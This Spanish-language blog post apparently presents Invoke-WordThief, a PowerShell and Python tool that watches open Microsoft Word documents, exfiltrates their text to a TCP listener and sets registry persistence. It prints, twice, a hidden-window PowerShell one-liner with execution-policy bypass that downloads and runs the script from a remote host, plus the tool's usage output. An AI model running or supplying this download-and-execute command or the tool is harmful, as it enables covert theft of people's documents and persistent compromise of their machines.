Invoke-WordThief es una herramienta que se compone de un script en powershell que conecta con un servidor TCP implementado en python y que monitoriza los documentos de Microsoft Word activos (.doc, .docx, etc.) para extraer/ex-filtrar sus textos. Para ello utiliza los objetos COM de Word y el script también añade un entrada en el registro en la rama HKCU (sin necesidad de privilegios de administración) para conseguir persistencia.
USO
Servidor:
Cliente:
powershell -nop -w 1 -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.138:8888/Invoke-WordThief.ps1');Invoke-WordThief -Server 192.168.1.138"
Fuente: https://github.com/danielwolfmann/Invoke-WordThief
USO
Servidor:
$ python3 ./logger.py -h
usage: logger.py [-h] [-o LOG_DIR] [-p LPORT] [-b BIND]
TCP Listener for Invoke-WordThief document text
optional arguments:
-h, --help show this help message and exit
-o LOG_DIR, -d LOG_DIR, --log_dir LOG_DIR
Full path of log directory.
-p LPORT, -l LPORT, --lport LPORT
Listening port of log server
-b BIND, --bind BIND Bind address to listen to
Cliente:
PS C:\Users\vis0r\Downloads\Invoke-WordThief-master> help Invoke-WordThief
NOMBRE
Invoke-WordThief
SINOPSIS
This is the main function, running all monitoring activity and multithreading (Jobs),
defined ScriptBlock that runs the text streaming phase (after doc has been opened).
SINTAXIS
Invoke-WordThief [-SERVER] <String> [[-PERSISTENCE] <Boolean>] [[-LOG_PORT] <Int32>] [[-HTTP_PORT] <Int32>]
[<CommonParameters>]
DESCRIPCIÓN
VÍNCULOS RELACIONADOS
NOTAS
Para ver los ejemplos, escriba: "get-help Invoke-WordThief -examples".
Para obtener más información, escriba: "get-help Invoke-WordThief -detailed".
Para obtener información técnica, escriba: "get-help Invoke-WordThief -full".
powershell -nop -w 1 -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.138:8888/Invoke-WordThief.ps1');Invoke-WordThief -Server 192.168.1.138"
Fuente: https://github.com/danielwolfmann/Invoke-WordThief
Comentarios
Publicar un comentario